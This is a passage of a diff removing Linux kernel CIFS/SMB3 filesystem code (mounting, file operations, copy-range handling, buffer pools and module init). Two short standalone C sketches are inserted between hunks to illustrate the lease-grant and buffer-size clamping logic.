+-
+-	if (cifs_sb->mnt_cifs_flags & CIFS_MOUNT_USE_PREFIX_PATH)
+-		return dget(sb->s_root);
+-
+-	full_path = cifs_build_path_to_root(ctx, cifs_sb,
+-				cifs_sb_master_tcon(cifs_sb), 0);
+-	if (full_path == NULL)
+-		return ERR_PTR(-ENOMEM);
+-
+-	cifs_dbg(FYI, "Get root dentry for %s\n", full_path);
+-
+-	sep = CIFS_DIR_SEP(cifs_sb);
+-	dentry = dget(sb->s_root);
+-	s = full_path;
+-
+-	do {
+-		struct inode *dir = d_inode(dentry);
+-		struct dentry *child;
+-
+-		if (!S_ISDIR(dir->i_mode)) {
+-			dput(dentry);
+-			dentry = ERR_PTR(-ENOTDIR);
+-			break;
+-		}
+-
+-		/* skip separators */
+-		while (*s == sep)
+-			s++;
+-		if (!*s)
+-			break;
+-		p = s++;
+-		/* next separator */
+-		while (*s && *s != sep)
+-			s++;
+-
+-		child = lookup_positive_unlocked(p, dentry, s - p);
+-		dput(dentry);
+-		dentry = child;
+-	} while (!IS_ERR(dentry));
+-	kfree(full_path);
+-	return dentry;
+-}
+-
+-static int cifs_set_super(struct super_block *sb, void *data)
+-{
+-	struct cifs_mnt_data *mnt_data = data;
+-	sb->s_fs_info = mnt_data->cifs_sb;
+-	return set_anon_super(sb, NULL);
+-}
+-
+-struct dentry *
+-cifs_smb3_do_mount(struct file_system_type *fs_type,
+-	      int flags, struct smb3_fs_context *old_ctx)
+-{
+-	int rc;
+-	struct super_block *sb = NULL;
+-	struct cifs_sb_info *cifs_sb = NULL;
+-	struct cifs_mnt_data mnt_data;
+-	struct dentry *root;
+-
+-	/*
+-	 * Print the attempted mount operation in the kernel / CIFS log
+-	 *	if CIFS_DEBUG && cifsFYI
+-	 */
+-	if (cifsFYI)
+-		cifs_dbg(FYI, "Devname: %s flags: %d\n", old_ctx->UNC, flags);
+-	else
+-		cifs_info("Attempting to mount %s\n", old_ctx->UNC);
+-
+-	cifs_sb = kzalloc(sizeof(struct cifs_sb_info), GFP_KERNEL);
+-	if (cifs_sb == NULL) {
+-		root = ERR_PTR(-ENOMEM);
+-		goto out;
+-	}
+-
+-	cifs_sb->ctx = kzalloc(sizeof(struct smb3_fs_context), GFP_KERNEL);
+-	if (!cifs_sb->ctx) {
+-		root = ERR_PTR(-ENOMEM);
+-		goto out;
+-	}
+-	rc = smb3_fs_context_dup(cifs_sb->ctx, old_ctx);
+-	if (rc) {
+-		root = ERR_PTR(rc);
+-		goto out;
+-	}
+-
+-	rc = cifs_setup_volume_info(cifs_sb->ctx, NULL, NULL);
+-	if (rc) {
+-		root = ERR_PTR(rc);
+-		goto out;
+-	}
+-
+-	rc = cifs_setup_cifs_sb(cifs_sb);
+-	if (rc) {
+-		root = ERR_PTR(rc);
+-		goto out;
+-	}
+-
+-	rc = cifs_mount(cifs_sb, cifs_sb->ctx);
+-	if (rc) {
+-		if (!(flags & SB_SILENT))
+-			cifs_dbg(VFS, "cifs_mount failed w/return code = %d\n",
+-				 rc);
+-		root = ERR_PTR(rc);
+-		goto out;
+-	}
+-
+-	mnt_data.ctx = cifs_sb->ctx;
+-	mnt_data.cifs_sb = cifs_sb;
+-	mnt_data.flags = flags;
+-
+-	/* BB should we make this contingent on mount parm? */
+-	flags |= SB_NODIRATIME | SB_NOATIME;
+-
+-	sb = sget(fs_type, cifs_match_super, cifs_set_super, flags, &mnt_data);
+-	if (IS_ERR(sb)) {
+-		root = ERR_CAST(sb);
+-		cifs_umount(cifs_sb);
+-		cifs_sb = NULL;
+-		goto out;
+-	}
+-
+-	if (sb->s_root) {
+-		cifs_dbg(FYI, "Use existing superblock\n");
+-		cifs_umount(cifs_sb);
+-		cifs_sb = NULL;
+-	} else {
+-		rc = cifs_read_super(sb);
+-		if (rc) {
+-			root = ERR_PTR(rc);
+-			goto out_super;
+-		}
+-
+-		sb->s_flags |= SB_ACTIVE;
+-	}
+-
+-	root = cifs_get_root(cifs_sb ? cifs_sb->ctx : old_ctx, sb);
+-	if (IS_ERR(root))
+-		goto out_super;
+-
+-	if (cifs_sb)
+-		cifs_sb->root = dget(root);
+-
+-	cifs_dbg(FYI, "dentry root is: %p\n", root);
+-	return root;
+-
+-out_super:
+-	deactivate_locked_super(sb);
+-	return root;
+-out:
+-	if (cifs_sb) {
+-		if (!sb || IS_ERR(sb)) {  /* otherwise kill_sb will handle */
+-			kfree(cifs_sb->prepath);
+-			smb3_cleanup_fs_context(cifs_sb->ctx);
+-			kfree(cifs_sb);
+-		}
+-	}
+-	return root;
+-}
+-
+-
+-static ssize_t
+-cifs_loose_read_iter(struct kiocb *iocb, struct iov_iter *iter)
+-{
+-	ssize_t rc;
+-	struct inode *inode = file_inode(iocb->ki_filp);
+-
+-	if (iocb->ki_flags & IOCB_DIRECT)
+-		return cifs_user_readv(iocb, iter);
+-
+-	rc = cifs_revalidate_mapping(inode);
+-	if (rc)
+-		return rc;
+-
+-	return generic_file_read_iter(iocb, iter);
+-}
+-
+-static ssize_t cifs_file_write_iter(struct kiocb *iocb, struct iov_iter *from)
+-{
+-	struct inode *inode = file_inode(iocb->ki_filp);
+-	struct cifsInodeInfo *cinode = CIFS_I(inode);
+-	ssize_t written;
+-	int rc;
+-
+-	if (iocb->ki_filp->f_flags & O_DIRECT) {
+-		written = cifs_user_writev(iocb, from);
+-		if (written > 0 && CIFS_CACHE_READ(cinode)) {
+-			cifs_zap_mapping(inode);
+-			cifs_dbg(FYI,
+-				 "Set no oplock for inode=%p after a write operation\n",
+-				 inode);
+-			cinode->oplock = 0;
+-		}
+-		return written;
+-	}
+-
+-	written = cifs_get_writer(cinode);
+-	if (written)
+-		return written;
+-
+-	written = generic_file_write_iter(iocb, from);
+-
+-	if (CIFS_CACHE_WRITE(CIFS_I(inode)))
+-		goto out;
+-
+-	rc = filemap_fdatawrite(inode->i_mapping);
+-	if (rc)
+-		cifs_dbg(FYI, "cifs_file_write_iter: %d rc on %p inode\n",
+-			 rc, inode);
+-
+-out:
+-	cifs_put_writer(cinode);
+-	return written;
+-}
+-
+-static loff_t cifs_llseek(struct file *file, loff_t offset, int whence)
+-{
+-	struct cifsFileInfo *cfile = file->private_data;
+-	struct cifs_tcon *tcon;
+-
+-	/*
+-	 * whence == SEEK_END || SEEK_DATA || SEEK_HOLE => we must revalidate
+-	 * the cached file length
+-	 */
+-	if (whence != SEEK_SET && whence != SEEK_CUR) {
+-		int rc;
+-		struct inode *inode = file_inode(file);
+-
+-		/*
+-		 * We need to be sure that all dirty pages are written and the
+-		 * server has the newest file length.
+-		 */
+-		if (!CIFS_CACHE_READ(CIFS_I(inode)) && inode->i_mapping &&
+-		    inode->i_mapping->nrpages != 0) {
+-			rc = filemap_fdatawait(inode->i_mapping);
+-			if (rc) {
+-				mapping_set_error(inode->i_mapping, rc);
+-				return rc;
+-			}
+-		}
+-		/*
+-		 * Some applications poll for the file length in this strange
+-		 * way so we must seek to end on non-oplocked files by
+-		 * setting the revalidate time to zero.
+-		 */
+-		CIFS_I(inode)->time = 0;
+-
+-		rc = cifs_revalidate_file_attr(file);
+-		if (rc < 0)
+-			return (loff_t)rc;
+-	}
+-	if (cfile && cfile->tlink) {
+-		tcon = tlink_tcon(cfile->tlink);
+-		if (tcon->ses->server->ops->llseek)
+-			return tcon->ses->server->ops->llseek(file, tcon,
+-							      offset, whence);
+-	}
+-	return generic_file_llseek(file, offset, whence);
+-}
+-
+-static int
+-cifs_setlease(struct file *file, long arg, struct file_lock **lease, void **priv)
+-{
+-	/*
+-	 * Note that this is called by vfs setlease with i_lock held to
+-	 * protect *lease from going away.
+-	 */
+-	struct inode *inode = file_inode(file);
+-	struct cifsFileInfo *cfile = file->private_data;
+-
+-	if (!(S_ISREG(inode->i_mode)))
+-		return -EINVAL;
+-
+-	/* Check if file is oplocked if this is request for new lease */
+-	if (arg == F_UNLCK ||
+-	    ((arg == F_RDLCK) && CIFS_CACHE_READ(CIFS_I(inode))) ||
+-	    ((arg == F_WRLCK) && CIFS_CACHE_WRITE(CIFS_I(inode))))
+-		return generic_setlease(file, arg, lease, priv);
+-	else if (tlink_tcon(cfile->tlink)->local_lease &&
+-		 !CIFS_CACHE_READ(CIFS_I(inode)))
+-		/*
+-		 * If the server claims to support oplock on this file, then we
+-		 * still need to check oplock even if the local_lease mount
+-		 * option is set, but there are servers which do not support
+-		 * oplock for which this mount option may be useful if the user
+-		 * knows that the file won't be changed on the server by anyone
+-		 * else.
+-		 */
+-		return generic_setlease(file, arg, lease, priv);
+-	else
+-		return -EAGAIN;
+-}
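
/*
 * A distilled sketch of the grant conditions checked in cifs_setlease()
 * above: unlock always passes through, read/write leases require the
 * matching cache state, and local_lease is the escape hatch when the
 * inode is not oplocked.  Hypothetical standalone helper, for
 * illustration only.
 */
#include <stdbool.h>
#include <stdio.h>

enum lease_arg { ARG_UNLCK, ARG_RDLCK, ARG_WRLCK };

static bool lease_may_be_granted(enum lease_arg arg, bool cache_read,
				 bool cache_write, bool local_lease)
{
	if (arg == ARG_UNLCK ||
	    (arg == ARG_RDLCK && cache_read) ||
	    (arg == ARG_WRLCK && cache_write))
		return true;
	return local_lease && !cache_read;	/* otherwise: -EAGAIN */
}

int main(void)
{
	printf("%d\n", lease_may_be_granted(ARG_RDLCK, true, false, false));  /* 1 */
	printf("%d\n", lease_may_be_granted(ARG_WRLCK, false, false, false)); /* 0 */
	return 0;
}
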
+-
+-struct file_system_type cifs_fs_type = {
+-	.owner = THIS_MODULE,
+-	.name = "cifs",
+-	.init_fs_context = smb3_init_fs_context,
+-	.parameters = smb3_fs_parameters,
+-	.kill_sb = cifs_kill_sb,
+-	.fs_flags = FS_RENAME_DOES_D_MOVE,
+-};
+-MODULE_ALIAS_FS("cifs");
+-
+-struct file_system_type smb3_fs_type = {
+-	.owner = THIS_MODULE,
+-	.name = "smb3",
+-	.init_fs_context = smb3_init_fs_context,
+-	.parameters = smb3_fs_parameters,
+-	.kill_sb = cifs_kill_sb,
+-	.fs_flags = FS_RENAME_DOES_D_MOVE,
+-};
+-MODULE_ALIAS_FS("smb3");
+-MODULE_ALIAS("smb3");
+-
+-const struct inode_operations cifs_dir_inode_ops = {
+-	.create = cifs_create,
+-	.atomic_open = cifs_atomic_open,
+-	.lookup = cifs_lookup,
+-	.getattr = cifs_getattr,
+-	.unlink = cifs_unlink,
+-	.link = cifs_hardlink,
+-	.mkdir = cifs_mkdir,
+-	.rmdir = cifs_rmdir,
+-	.rename = cifs_rename2,
+-	.permission = cifs_permission,
+-	.setattr = cifs_setattr,
+-	.symlink = cifs_symlink,
+-	.mknod   = cifs_mknod,
+-	.listxattr = cifs_listxattr,
+-};
+-
+-const struct inode_operations cifs_file_inode_ops = {
+-	.setattr = cifs_setattr,
+-	.getattr = cifs_getattr,
+-	.permission = cifs_permission,
+-	.listxattr = cifs_listxattr,
+-	.fiemap = cifs_fiemap,
+-};
+-
+-const char *cifs_get_link(struct dentry *dentry, struct inode *inode,
+-			    struct delayed_call *done)
+-{
+-	char *target_path;
+-
+-	target_path = kmalloc(PATH_MAX, GFP_KERNEL);
+-	if (!target_path)
+-		return ERR_PTR(-ENOMEM);
+-
+-	spin_lock(&inode->i_lock);
+-	if (likely(CIFS_I(inode)->symlink_target)) {
+-		strscpy(target_path, CIFS_I(inode)->symlink_target, PATH_MAX);
+-	} else {
+-		kfree(target_path);
+-		target_path = ERR_PTR(-EOPNOTSUPP);
+-	}
+-	spin_unlock(&inode->i_lock);
+-
+-	if (!IS_ERR(target_path))
+-		set_delayed_call(done, kfree_link, target_path);
+-
+-	return target_path;
+-}
+-
+-const struct inode_operations cifs_symlink_inode_ops = {
+-	.get_link = cifs_get_link,
+-	.permission = cifs_permission,
+-	.listxattr = cifs_listxattr,
+-};
+-
+-static loff_t cifs_remap_file_range(struct file *src_file, loff_t off,
+-		struct file *dst_file, loff_t destoff, loff_t len,
+-		unsigned int remap_flags)
+-{
+-	struct inode *src_inode = file_inode(src_file);
+-	struct inode *target_inode = file_inode(dst_file);
+-	struct cifsFileInfo *smb_file_src = src_file->private_data;
+-	struct cifsFileInfo *smb_file_target;
+-	struct cifs_tcon *target_tcon;
+-	unsigned int xid;
+-	int rc;
+-
+-	if (remap_flags & ~(REMAP_FILE_DEDUP | REMAP_FILE_ADVISORY))
+-		return -EINVAL;
+-
+-	cifs_dbg(FYI, "clone range\n");
+-
+-	xid = get_xid();
+-
+-	if (!src_file->private_data || !dst_file->private_data) {
+-		rc = -EBADF;
+-		cifs_dbg(VFS, "missing cifsFileInfo on copy range src file\n");
+-		goto out;
+-	}
+-
+-	smb_file_target = dst_file->private_data;
+-	target_tcon = tlink_tcon(smb_file_target->tlink);
+-
+-	/*
+-	 * Note: the cifs case is easier than btrfs since the server is
+-	 * responsible for checking for proper open modes and file type,
+-	 * and if it wants to, the server could even support copying a
+-	 * range where source = target
+-	 */
+-	lock_two_nondirectories(target_inode, src_inode);
+-
+-	if (len == 0)
+-		len = src_inode->i_size - off;
+-
+-	cifs_dbg(FYI, "about to flush pages\n");
+-	/* should we flush the first and last pages first? */
+-	truncate_inode_pages_range(&target_inode->i_data, destoff,
+-				   PAGE_ALIGN(destoff + len)-1);
+-
+-	if (target_tcon->ses->server->ops->duplicate_extents)
+-		rc = target_tcon->ses->server->ops->duplicate_extents(xid,
+-			smb_file_src, smb_file_target, off, len, destoff);
+-	else
+-		rc = -EOPNOTSUPP;
+-
+-	/* force revalidate of size and timestamps of target file now
+-	   that target is updated on the server */
+-	CIFS_I(target_inode)->time = 0;
+-	/* although unlocking in the reverse order from locking is not
+-	   strictly necessary here, it is a little cleaner to be consistent */
+-	unlock_two_nondirectories(src_inode, target_inode);
+-out:
+-	free_xid(xid);
+-	return rc < 0 ? rc : len;
+-}
+-
+-ssize_t cifs_file_copychunk_range(unsigned int xid,
+-				struct file *src_file, loff_t off,
+-				struct file *dst_file, loff_t destoff,
+-				size_t len, unsigned int flags)
+-{
+-	struct inode *src_inode = file_inode(src_file);
+-	struct inode *target_inode = file_inode(dst_file);
+-	struct cifsFileInfo *smb_file_src;
+-	struct cifsFileInfo *smb_file_target;
+-	struct cifs_tcon *src_tcon;
+-	struct cifs_tcon *target_tcon;
+-	ssize_t rc;
+-
+-	cifs_dbg(FYI, "copychunk range\n");
+-
+-	if (!src_file->private_data || !dst_file->private_data) {
+-		rc = -EBADF;
+-		cifs_dbg(VFS, "missing cifsFileInfo on copy range src file\n");
+-		goto out;
+-	}
+-
+-	rc = -EXDEV;
+-	smb_file_target = dst_file->private_data;
+-	smb_file_src = src_file->private_data;
+-	src_tcon = tlink_tcon(smb_file_src->tlink);
+-	target_tcon = tlink_tcon(smb_file_target->tlink);
+-
+-	if (src_tcon->ses != target_tcon->ses) {
+-		cifs_dbg(VFS, "source and target of copy not on same server\n");
+-		goto out;
+-	}
+-
+-	rc = -EOPNOTSUPP;
+-	if (!target_tcon->ses->server->ops->copychunk_range)
+-		goto out;
+-
+-	/*
+-	 * Note: the cifs case is easier than btrfs since the server is
+-	 * responsible for checking for proper open modes and file type,
+-	 * and if it wants to, the server could even support copying a
+-	 * range where source = target
+-	 */
+-	lock_two_nondirectories(target_inode, src_inode);
+-
+-	cifs_dbg(FYI, "about to flush pages\n");
+-
+-	rc = filemap_write_and_wait_range(src_inode->i_mapping, off,
+-					  off + len - 1);
+-	if (rc)
+-		goto unlock;
+-
+-	/* should we flush the first and last pages first? */
+-	truncate_inode_pages(&target_inode->i_data, 0);
+-
+-	rc = file_modified(dst_file);
+-	if (!rc)
+-		rc = target_tcon->ses->server->ops->copychunk_range(xid,
+-			smb_file_src, smb_file_target, off, len, destoff);
+-
+-	file_accessed(src_file);
+-
+-	/* force revalidate of size and timestamps of target file now
+-	 * that target is updated on the server
+-	 */
+-	CIFS_I(target_inode)->time = 0;
+-
+-unlock:
+-	/* although unlocking in the reverse order from locking is not
+-	 * strictly necessary here, it is a little cleaner to be consistent
+-	 */
+-	unlock_two_nondirectories(src_inode, target_inode);
+-
+-out:
+-	return rc;
+-}
+-
+-/*
+- * Directory operations under CIFS/SMB2/SMB3 are synchronous, so fsync()
+- * is a dummy operation.
+- */
+-static int cifs_dir_fsync(struct file *file, loff_t start, loff_t end, int datasync)
+-{
+-	cifs_dbg(FYI, "Sync directory - name: %pD datasync: 0x%x\n",
+-		 file, datasync);
+-
+-	return 0;
+-}
+-
+-static ssize_t cifs_copy_file_range(struct file *src_file, loff_t off,
+-				struct file *dst_file, loff_t destoff,
+-				size_t len, unsigned int flags)
+-{
+-	unsigned int xid = get_xid();
+-	ssize_t rc;
+-	struct cifsFileInfo *cfile = dst_file->private_data;
+-
+-	if (cfile->swapfile) {
+-		rc = -EOPNOTSUPP;
+-		free_xid(xid);
+-		return rc;
+-	}
+-
+-	rc = cifs_file_copychunk_range(xid, src_file, off, dst_file, destoff,
+-					len, flags);
+-	free_xid(xid);
+-
+-	if (rc == -EOPNOTSUPP || rc == -EXDEV)
+-		rc = generic_copy_file_range(src_file, off, dst_file,
+-					     destoff, len, flags);
+-	return rc;
+-}
+-
+-const struct file_operations cifs_file_ops = {
+-	.read_iter = cifs_loose_read_iter,
+-	.write_iter = cifs_file_write_iter,
+-	.open = cifs_open,
+-	.release = cifs_close,
+-	.lock = cifs_lock,
+-	.flock = cifs_flock,
+-	.fsync = cifs_fsync,
+-	.flush = cifs_flush,
+-	.mmap  = cifs_file_mmap,
+-	.splice_read = generic_file_splice_read,
+-	.splice_write = iter_file_splice_write,
+-	.llseek = cifs_llseek,
+-	.unlocked_ioctl	= cifs_ioctl,
+-	.copy_file_range = cifs_copy_file_range,
+-	.remap_file_range = cifs_remap_file_range,
+-	.setlease = cifs_setlease,
+-	.fallocate = cifs_fallocate,
+-};
+-
+-const struct file_operations cifs_file_strict_ops = {
+-	.read_iter = cifs_strict_readv,
+-	.write_iter = cifs_strict_writev,
+-	.open = cifs_open,
+-	.release = cifs_close,
+-	.lock = cifs_lock,
+-	.flock = cifs_flock,
+-	.fsync = cifs_strict_fsync,
+-	.flush = cifs_flush,
+-	.mmap = cifs_file_strict_mmap,
+-	.splice_read = generic_file_splice_read,
+-	.splice_write = iter_file_splice_write,
+-	.llseek = cifs_llseek,
+-	.unlocked_ioctl	= cifs_ioctl,
+-	.copy_file_range = cifs_copy_file_range,
+-	.remap_file_range = cifs_remap_file_range,
+-	.setlease = cifs_setlease,
+-	.fallocate = cifs_fallocate,
+-};
+-
+-const struct file_operations cifs_file_direct_ops = {
+-	.read_iter = cifs_direct_readv,
+-	.write_iter = cifs_direct_writev,
+-	.open = cifs_open,
+-	.release = cifs_close,
+-	.lock = cifs_lock,
+-	.flock = cifs_flock,
+-	.fsync = cifs_fsync,
+-	.flush = cifs_flush,
+-	.mmap = cifs_file_mmap,
+-	.splice_read = generic_file_splice_read,
+-	.splice_write = iter_file_splice_write,
+-	.unlocked_ioctl  = cifs_ioctl,
+-	.copy_file_range = cifs_copy_file_range,
+-	.remap_file_range = cifs_remap_file_range,
+-	.llseek = cifs_llseek,
+-	.setlease = cifs_setlease,
+-	.fallocate = cifs_fallocate,
+-};
+-
+-const struct file_operations cifs_file_nobrl_ops = {
+-	.read_iter = cifs_loose_read_iter,
+-	.write_iter = cifs_file_write_iter,
+-	.open = cifs_open,
+-	.release = cifs_close,
+-	.fsync = cifs_fsync,
+-	.flush = cifs_flush,
+-	.mmap  = cifs_file_mmap,
+-	.splice_read = generic_file_splice_read,
+-	.splice_write = iter_file_splice_write,
+-	.llseek = cifs_llseek,
+-	.unlocked_ioctl	= cifs_ioctl,
+-	.copy_file_range = cifs_copy_file_range,
+-	.remap_file_range = cifs_remap_file_range,
+-	.setlease = cifs_setlease,
+-	.fallocate = cifs_fallocate,
+-};
+-
+-const struct file_operations cifs_file_strict_nobrl_ops = {
+-	.read_iter = cifs_strict_readv,
+-	.write_iter = cifs_strict_writev,
+-	.open = cifs_open,
+-	.release = cifs_close,
+-	.fsync = cifs_strict_fsync,
+-	.flush = cifs_flush,
+-	.mmap = cifs_file_strict_mmap,
+-	.splice_read = generic_file_splice_read,
+-	.splice_write = iter_file_splice_write,
+-	.llseek = cifs_llseek,
+-	.unlocked_ioctl	= cifs_ioctl,
+-	.copy_file_range = cifs_copy_file_range,
+-	.remap_file_range = cifs_remap_file_range,
+-	.setlease = cifs_setlease,
+-	.fallocate = cifs_fallocate,
+-};
+-
+-const struct file_operations cifs_file_direct_nobrl_ops = {
+-	.read_iter = cifs_direct_readv,
+-	.write_iter = cifs_direct_writev,
+-	.open = cifs_open,
+-	.release = cifs_close,
+-	.fsync = cifs_fsync,
+-	.flush = cifs_flush,
+-	.mmap = cifs_file_mmap,
+-	.splice_read = generic_file_splice_read,
+-	.splice_write = iter_file_splice_write,
+-	.unlocked_ioctl  = cifs_ioctl,
+-	.copy_file_range = cifs_copy_file_range,
+-	.remap_file_range = cifs_remap_file_range,
+-	.llseek = cifs_llseek,
+-	.setlease = cifs_setlease,
+-	.fallocate = cifs_fallocate,
+-};
+-
+-const struct file_operations cifs_dir_ops = {
+-	.iterate_shared = cifs_readdir,
+-	.release = cifs_closedir,
+-	.read    = generic_read_dir,
+-	.unlocked_ioctl  = cifs_ioctl,
+-	.copy_file_range = cifs_copy_file_range,
+-	.remap_file_range = cifs_remap_file_range,
+-	.llseek = generic_file_llseek,
+-	.fsync = cifs_dir_fsync,
+-};
+-
+-static void
+-cifs_init_once(void *inode)
+-{
+-	struct cifsInodeInfo *cifsi = inode;
+-
+-	inode_init_once(&cifsi->netfs.inode);
+-	init_rwsem(&cifsi->lock_sem);
+-}
+-
+-static int __init
+-cifs_init_inodecache(void)
+-{
+-	cifs_inode_cachep = kmem_cache_create("cifs_inode_cache",
+-					      sizeof(struct cifsInodeInfo),
+-					      0, (SLAB_RECLAIM_ACCOUNT|
+-						SLAB_MEM_SPREAD|SLAB_ACCOUNT),
+-					      cifs_init_once);
+-	if (cifs_inode_cachep == NULL)
+-		return -ENOMEM;
+-
+-	return 0;
+-}
+-
+-static void
+-cifs_destroy_inodecache(void)
+-{
+-	/*
+-	 * Make sure all delayed rcu free inodes are flushed before we
+-	 * destroy cache.
+-	 */
+-	rcu_barrier();
+-	kmem_cache_destroy(cifs_inode_cachep);
+-}
+-
+-static int
+-cifs_init_request_bufs(void)
+-{
+-	/*
+-	 * The SMB2 maximum header size is bigger than the CIFS one - no
+-	 * problem allocating some more bytes for CIFS.
+-	 */
+-	size_t max_hdr_size = MAX_SMB2_HDR_SIZE;
+-
+-	if (CIFSMaxBufSize < 8192) {
+-	/* Buffer size cannot be smaller than 2 * PATH_MAX since the maximum
+-	Unicode path name has to fit in any SMB/CIFS path-based frame */
+-		CIFSMaxBufSize = 8192;
+-	} else if (CIFSMaxBufSize > 1024*127) {
+-		CIFSMaxBufSize = 1024 * 127;
+-	} else {
+-		CIFSMaxBufSize &= 0x1FE00; /* Round size down to a 512-byte multiple */
+-	}
+-/*
+-	cifs_dbg(VFS, "CIFSMaxBufSize %d 0x%x\n",
+-		 CIFSMaxBufSize, CIFSMaxBufSize);
+-*/
+-	cifs_req_cachep = kmem_cache_create_usercopy("cifs_request",
+-					    CIFSMaxBufSize + max_hdr_size, 0,
+-					    SLAB_HWCACHE_ALIGN, 0,
+-					    CIFSMaxBufSize + max_hdr_size,
+-					    NULL);
+-	if (cifs_req_cachep == NULL)
+-		return -ENOMEM;
+-
+-	if (cifs_min_rcv < 1)
+-		cifs_min_rcv = 1;
+-	else if (cifs_min_rcv > 64) {
+-		cifs_min_rcv = 64;
+-		cifs_dbg(VFS, "cifs_min_rcv set to maximum (64)\n");
+-	}
+-
+-	cifs_req_poolp = mempool_create_slab_pool(cifs_min_rcv,
+-						  cifs_req_cachep);
+-
+-	if (cifs_req_poolp == NULL) {
+-		kmem_cache_destroy(cifs_req_cachep);
+-		return -ENOMEM;
+-	}
+-	/* MAX_CIFS_SMALL_BUFFER_SIZE bytes is enough for most SMB responses and
+-	almost all handle-based requests (but not the write response, nor is it
+-	sufficient for path-based requests).  A smaller size would have
+-	been more efficient (compacting multiple slab items on one 4k page)
+-	for the case in which debug was on, but this larger size allows
+-	more SMBs to use the small buffer alloc and is still much more
+-	efficient to alloc 1 per page off the slab compared to a 17K (5 page)
+-	alloc of large cifs buffers even when page debugging is on */
+-	cifs_sm_req_cachep = kmem_cache_create_usercopy("cifs_small_rq",
+-			MAX_CIFS_SMALL_BUFFER_SIZE, 0, SLAB_HWCACHE_ALIGN,
+-			0, MAX_CIFS_SMALL_BUFFER_SIZE, NULL);
+-	if (cifs_sm_req_cachep == NULL) {
+-		mempool_destroy(cifs_req_poolp);
+-		kmem_cache_destroy(cifs_req_cachep);
+-		return -ENOMEM;
+-	}
+-
+-	if (cifs_min_small < 2)
+-		cifs_min_small = 2;
+-	else if (cifs_min_small > 256) {
+-		cifs_min_small = 256;
+-		cifs_dbg(FYI, "cifs_min_small set to maximum (256)\n");
+-	}
+-
+-	cifs_sm_req_poolp = mempool_create_slab_pool(cifs_min_small,
+-						     cifs_sm_req_cachep);
+-
+-	if (cifs_sm_req_poolp == NULL) {
+-		mempool_destroy(cifs_req_poolp);
+-		kmem_cache_destroy(cifs_req_cachep);
+-		kmem_cache_destroy(cifs_sm_req_cachep);
+-		return -ENOMEM;
+-	}
+-
+-	return 0;
+-}
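
/*
 * A standalone sketch of the CIFSMaxBufSize clamping in
 * cifs_init_request_bufs() above: values are clamped to
 * [8192, 127 * 1024], and intermediate values are rounded down to a
 * 512-byte multiple by the 0x1FE00 mask.  Demo code only.
 */
#include <stdio.h>

static unsigned int clamp_bufsize(unsigned int size)
{
	if (size < 8192)
		return 8192;
	if (size > 1024 * 127)
		return 1024 * 127;
	return size & 0x1FE00;	/* round down to a 512-byte multiple */
}

int main(void)
{
	printf("%u %u %u\n", clamp_bufsize(4096),
	       clamp_bufsize(1024 * 1024), clamp_bufsize(70000));
	/* prints: 8192 130048 69632 */
	return 0;
}
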
+-
+-static void
+-cifs_destroy_request_bufs(void)
+-{
+-	mempool_destroy(cifs_req_poolp);
+-	kmem_cache_destroy(cifs_req_cachep);
+-	mempool_destroy(cifs_sm_req_poolp);
+-	kmem_cache_destroy(cifs_sm_req_cachep);
+-}
+-
+-static int init_mids(void)
+-{
+-	cifs_mid_cachep = kmem_cache_create("cifs_mpx_ids",
+-					    sizeof(struct mid_q_entry), 0,
+-					    SLAB_HWCACHE_ALIGN, NULL);
+-	if (cifs_mid_cachep == NULL)
+-		return -ENOMEM;
+-
+-	/* 3 is a reasonable minimum number of simultaneous operations */
+-	cifs_mid_poolp = mempool_create_slab_pool(3, cifs_mid_cachep);
+-	if (cifs_mid_poolp == NULL) {
+-		kmem_cache_destroy(cifs_mid_cachep);
+-		return -ENOMEM;
+-	}
+-
+-	return 0;
+-}
+-
+-static void destroy_mids(void)
+-{
+-	mempool_destroy(cifs_mid_poolp);
+-	kmem_cache_destroy(cifs_mid_cachep);
+-}
+-
+-static int __init
+-init_cifs(void)
+-{
+-	int rc = 0;
+-	cifs_proc_init();
+-	INIT_LIST_HEAD(&cifs_tcp_ses_list);
+-/*
+- *  Initialize Global counters
+- */
+-	atomic_set(&sesInfoAllocCount, 0);
+-	atomic_set(&tconInfoAllocCount, 0);
+-	atomic_set(&tcpSesNextId, 0);
+-	atomic_set(&tcpSesAllocCount, 0);
+-	atomic_set(&tcpSesReconnectCount, 0);
+-	atomic_set(&tconInfoReconnectCount, 0);
+-
+-	atomic_set(&buf_alloc_count, 0);
+-	atomic_set(&small_buf_alloc_count, 0);
+-#ifdef CONFIG_CIFS_STATS2
+-	atomic_set(&total_buf_alloc_count, 0);
+-	atomic_set(&total_small_buf_alloc_count, 0);
+-	if (slow_rsp_threshold < 1)
+-		cifs_dbg(FYI, "slow_response_threshold msgs disabled\n");
+-	else if (slow_rsp_threshold > 32767)
+-		cifs_dbg(VFS,
+-		       "slow response threshold set higher than recommended (0 to 32767)\n");
+-#endif /* CONFIG_CIFS_STATS2 */
+-
+-	atomic_set(&mid_count, 0);
+-	GlobalCurrentXid = 0;
+-	GlobalTotalActiveXid = 0;
+-	GlobalMaxActiveXid = 0;
+-	spin_lock_init(&cifs_tcp_ses_lock);
+-	spin_lock_init(&GlobalMid_Lock);
+-
+-	cifs_lock_secret = get_random_u32();
+-
+-	if (cifs_max_pending < 2) {
+-		cifs_max_pending = 2;
+-		cifs_dbg(FYI, "cifs_max_pending set to min of 2\n");
+-	} else if (cifs_max_pending > CIFS_MAX_REQ) {
+-		cifs_max_pending = CIFS_MAX_REQ;
+-		cifs_dbg(FYI, "cifs_max_pending set to max of %u\n",
+-			 CIFS_MAX_REQ);
+-	}
+-
+-	cifsiod_wq = alloc_workqueue("cifsiod", WQ_FREEZABLE|WQ_MEM_RECLAIM, 0);
+-	if (!cifsiod_wq) {
+-		rc = -ENOMEM;
+-		goto out_clean_proc;
+-	}
+-
+-	/*
+-	 * Consider setting limit != 0 in the future, maybe to
+-	 * min(num_of_cores - 1, 3), so that we don't launch too many worker
+-	 * threads, but Documentation/core-api/workqueue.rst recommends
+-	 * setting it to 0
+-	 */
+-
+-	/* WQ_UNBOUND allows decrypt tasks to run on any CPU */
+-	decrypt_wq = alloc_workqueue("smb3decryptd",
+-				     WQ_UNBOUND|WQ_FREEZABLE|WQ_MEM_RECLAIM, 0);
+-	if (!decrypt_wq) {
+-		rc = -ENOMEM;
+-		goto out_destroy_cifsiod_wq;
+-	}
+-
+-	fileinfo_put_wq = alloc_workqueue("cifsfileinfoput",
+-				     WQ_UNBOUND|WQ_FREEZABLE|WQ_MEM_RECLAIM, 0);
+-	if (!fileinfo_put_wq) {
+-		rc = -ENOMEM;
+-		goto out_destroy_decrypt_wq;
+-	}
+-
+-	cifsoplockd_wq = alloc_workqueue("cifsoplockd",
